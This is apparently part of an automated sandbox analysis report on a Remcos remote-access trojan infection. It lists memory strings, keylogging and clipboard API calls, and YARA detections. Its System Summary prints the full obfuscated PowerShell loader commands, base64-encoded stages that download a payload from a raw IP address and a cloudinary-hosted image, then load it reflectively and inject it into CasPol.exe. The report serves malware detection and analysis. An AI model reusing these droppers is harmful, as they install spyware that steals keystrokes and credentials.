                      Source: powershell.exe, 00000007.00000002.2409021944.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2409021944.0000000006C64000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                      Source: CasPol.exe, 0000000A.00000002.4498075941.0000000000DB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                      Source: powershell.exe, 00000003.00000002.2160140336.0000000004FDF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                      Source: powershell.exe, 00000003.00000002.2161760201.0000000005A6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2409021944.0000000005DFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                      Source: bhvF93F.tmp.11.drString found in binary or memory: http://ocsp.digicert.com0
                      Source: powershell.exe, 00000007.00000002.2409021944.0000000004EE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                      Source: powershell.exe, 00000003.00000002.2160140336.0000000004B58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                      Source: powershell.exe, 00000003.00000002.2160140336.0000000004A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2409021944.0000000004D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                      Source: powershell.exe, 00000003.00000002.2160140336.0000000004B58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                      Source: powershell.exe, 00000007.00000002.2409021944.0000000004EE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                      Source: CasPol.exe, CasPol.exe, 0000000E.00000002.2465428590.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                      Source: CasPol.exe, CasPol.exe, 0000000E.00000002.2465428590.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                      Source: CasPol.exe, 0000000E.00000002.2465428590.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                      Source: CasPol.exe, 0000000E.00000002.2465428590.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                      Source: powershell.exe, 00000003.00000002.2164993649.00000000080A6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.z
                      Source: CasPol.exe, 0000000B.00000002.2476487096.0000000001334000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                      Source: CasPol.exe, 0000000E.00000002.2465428590.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                      Source: powershell.exe, 00000003.00000002.2160140336.0000000004A01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2409021944.0000000004D91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                      Source: powershell.exe, 00000003.00000002.2160140336.0000000004B58000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                      Source: powershell.exe, 00000007.00000002.2409021944.0000000005000000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee
                      Source: powershell.exe, 00000007.00000002.2409021944.0000000005000000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://analytics.paste.ee;
                      Source: powershell.exe, 00000007.00000002.2409021944.0000000005000000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com
                      Source: powershell.exe, 00000007.00000002.2409021944.0000000005000000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdnjs.cloudflare.com;
                      Source: powershell.exe, 00000007.00000002.2409021944.0000000005DFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                      Source: powershell.exe, 00000007.00000002.2409021944.0000000005DFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                      Source: powershell.exe, 00000007.00000002.2409021944.0000000005DFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                      Source: powershell.exe, 00000007.00000002.2409021944.0000000005000000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com
                      Source: powershell.exe, 00000007.00000002.2409021944.0000000005000000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com;
                      Source: powershell.exe, 00000007.00000002.2409021944.0000000004EE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                      Source: powershell.exe, 00000007.00000002.2409021944.000000000693F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dahall/taskscheduler
                      Source: powershell.exe, 00000003.00000002.2164993649.00000000080F5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                      Source: CasPol.exe, 0000000B.00000002.2477134038.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                      Source: CasPol.exe, 0000000B.00000002.2477134038.000000000152E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                      Source: CasPol.exe, 0000000B.00000002.2477134038.000000000152E000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.2478926109.00000000019A9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                      Source: CasPol.exeString found in binary or memory: https://login.yahoo.com/config/login
                      Source: powershell.exe, 00000003.00000002.2161760201.0000000005A6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2409021944.0000000005DFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                      Source: powershell.exe, 00000007.00000002.2409021944.0000000004EE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com
                      Source: powershell.exe, 00000007.00000002.2409021944.0000000004EE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpg
                      Source: powershell.exe, 00000007.00000002.2409021944.0000000004EE8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://res.cloudinary.com/dzvai86uh/image/upload/v1734050991/unxaooiykxfmw9pan4z1.jpgt
                      Source: powershell.exe, 00000007.00000002.2409021944.0000000005000000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                      Source: powershell.exe, 00000007.00000002.2409021944.0000000005000000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                      Source: powershell.exe, 00000007.00000002.2409021944.0000000005000000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, CasPol.exe, 0000000E.00000002.2465428590.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                      Source: CasPol.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                      Source: powershell.exe, 00000007.00000002.2409021944.0000000005000000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                      Source: powershell.exe, 00000007.00000002.2409021944.0000000005000000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                      Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.5:49742 version: TLS 1.2

                      Key, Mouse, Clipboard, Microphone and Screen Capturing

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000010_2_004099E4
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,10_2_004159C6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,10_2_004159C6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_0040987A EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,11_2_0040987A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 11_2_004098E2 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,11_2_004098E2
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,12_2_00406DFC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,12_2_00406E9F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_004068B5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 14_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,14_2_004072B5
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,10_2_004159C6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,10_2_00409B10
                      Source: Yara matchFile source: 7.2.powershell.exe.6d053d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.powershell.exe.6d053d0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2409021944.0000000006C64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2409021944.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7080, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6220, type: MEMORYSTR

                      E-Banking Fraud

                      barindex
                      Source: Yara matchFile source: 7.2.powershell.exe.6d053d0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.powershell.exe.6d053d0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 10.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0000000A.00000002.4497247873.0000000000D78000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2409021944.0000000006C64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.2409021944.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7080, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 6220, type: MEMORYSTR

                      Spam, unwanted Advertisements and Ransom Demands

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 10_2_0041BB87 SystemParametersInfoW,10_2_0041BB87

                      System Summary

                      barindex
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $corythosaurus = 'JGRlc3Rvb3IgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWFudWZhY3RvcnkgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRpbGlvdGliaWFsID0gJG1hbnVmYWN0b3J5LkRvd25sb2FkRGF0YSgkZGVzdG9vcik7JEJlbGxvYyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRpbGlvdGliaWFsKTskbWlzcGVyY2VpdmVzID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRvcmJpZm9sZCA9ICc8PEJBU0U2NF9FTkQ+Pic7JGh5c3Rlcm9pZCA9ICRCZWxsb2MuSW5kZXhPZigkbWlzcGVyY2VpdmVzKTskYWRkaXRpb25hbGl0eSA9ICRCZWxsb2MuSW5kZXhPZigkb3JiaWZvbGQpOyRoeXN0ZXJvaWQgLWdlIDAgLWFuZCAkYWRkaXRpb25hbGl0eSAtZ3QgJGh5c3Rlcm9pZDskaHlzdGVyb2lkICs9ICRtaXNwZXJjZWl2ZXMuTGVuZ3RoOyR3YWdnaW5zID0gJGFkZGl0aW9uYWxpdHkgLSAkaHlzdGVyb2lkOyRyZWNyZW1lbnRzID0gJEJlbGxvYy5TdWJzdHJpbmcoJGh5c3Rlcm9pZCwgJHdhZ2dpbnMpOyRHZW5ldmEgPSAtam9pbiAoJHJlY3JlbWVudHMuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlY3JlbWVudHMuTGVuZ3RoKV07JGppbGxhcm9vcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJEdlbmV2YSk7JHBvbXVtID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkamlsbGFyb29zKTskbG93ZG93biA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRsb3dkb3duLkludm9rZSgkbnVsbCwgQCgnMC84VjlycS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGlzb21lcmljYWxseScsICckaXNvbWVyaWNhbGx5JywgJyRpc29tZXJpY2FsbHknLCAnQ2FzUG9sJywgJyRpc29tZXJpY2FsbHknLCAnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnMScsJyRpc29tZXJpY2FsbHknLCcnKSk7';$pycnaster = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($corythosaurus));Invoke-Expression $pycnaster
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsHeLL -ex bYpaSs -nOP -w 1 -C DEvICECRedentiALdePLOYmEnt ; INvOke-exPrEssIOn($(inVOKe-exPressioN('[sYSTEm.teXT.EnCOdInG]'+[CHAR]58+[cHAR]58+'utf8.gETstrInG([sYsTem.CoNVErt]'+[chaR]58+[Char]58+'fROmbASe64StRiNg('+[cHaR]34+'JEdFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURkLVRZUEUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lbWJFcmRFZmluaVRJb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kbEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElETWtQbkcsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIERsaCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdHgsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBTVCxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUUFrKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJ6dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hbUVzcGFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBkRWFPICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJEdFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS80Ny9lbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3c2Zvci50SUYiLCIkRW5WOkFQUERBVEFcZW50aXJldGltZW5lZWRnb29kdGhpbmdzZm9yZ2V0YmFja2Jlc3R0aGluZ3N3aXRoZ29vZG5ldy52YlMiLDAsMCk7c3RBUnQtU0xlZVAoMyk7SU52T2tlLUVYcHJlc3NJT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlblY6QVBQREFUQVxlbnRpcmV0aW1lbmVlZGdvb2R0aGluZ3Nmb3JnZXRiYWNrYmVzdHRoaW5nc3dpdGhnb29kbmV3LnZiUyI='+[cHar]0X22+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $corythosaurus = 'JGRlc3Rvb3IgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskbWFudWZhY3RvcnkgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRpbGlvdGliaWFsID0gJG1hbnVmYWN0b3J5LkRvd25sb2FkRGF0YSgkZGVzdG9vcik7JEJlbGxvYyA9IFtTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKCRpbGlvdGliaWFsKTskbWlzcGVyY2VpdmVzID0gJzw8QkFTRTY0X1NUQVJUPj4nOyRvcmJpZm9sZCA9ICc8PEJBU0U2NF9FTkQ+Pic7JGh5c3Rlcm9pZCA9ICRCZWxsb2MuSW5kZXhPZigkbWlzcGVyY2VpdmVzKTskYWRkaXRpb25hbGl0eSA9ICRCZWxsb2MuSW5kZXhPZigkb3JiaWZvbGQpOyRoeXN0ZXJvaWQgLWdlIDAgLWFuZCAkYWRkaXRpb25hbGl0eSAtZ3QgJGh5c3Rlcm9pZDskaHlzdGVyb2lkICs9ICRtaXNwZXJjZWl2ZXMuTGVuZ3RoOyR3YWdnaW5zID0gJGFkZGl0aW9uYWxpdHkgLSAkaHlzdGVyb2lkOyRyZWNyZW1lbnRzID0gJEJlbGxvYy5TdWJzdHJpbmcoJGh5c3Rlcm9pZCwgJHdhZ2dpbnMpOyRHZW5ldmEgPSAtam9pbiAoJHJlY3JlbWVudHMuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJHJlY3JlbWVudHMuTGVuZ3RoKV07JGppbGxhcm9vcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJEdlbmV2YSk7JHBvbXVtID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkamlsbGFyb29zKTskbG93ZG93biA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRsb3dkb3duLkludm9rZSgkbnVsbCwgQCgnMC84VjlycS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnJGlzb21lcmljYWxseScsICckaXNvbWVyaWNhbGx5JywgJyRpc29tZXJpY2FsbHknLCAnQ2FzUG9sJywgJyRpc29tZXJpY2FsbHknLCAnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnJGlzb21lcmljYWxseScsJyRpc29tZXJpY2FsbHknLCckaXNvbWVyaWNhbGx5JywnMScsJyRpc29tZXJpY2FsbHknLCcnKSk7';$pycnaster = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($corythosaurus));Invoke-Expression $pycnasterJump to behavior
                      Source: 7.2.powershell.exe.6d053d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 7.2.powershell.exe.6d053d0.1.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 7.2.powershell.exe.6d053d0.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 7.2.powershell.exe.6d053d0.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 7.2.powershell.exe.6d053d0.1.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 7.2.powershell.exe.6d053d0.1.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 10.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 10.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 10.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 10.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 10.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 10.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0000000A.00000002.4494795969.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000007.00000002.2409021944.0000000006C64000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000007.00000002.2409021944.0000000005DFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 7080, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 7080, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: CasPol.exe PID: 6220, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
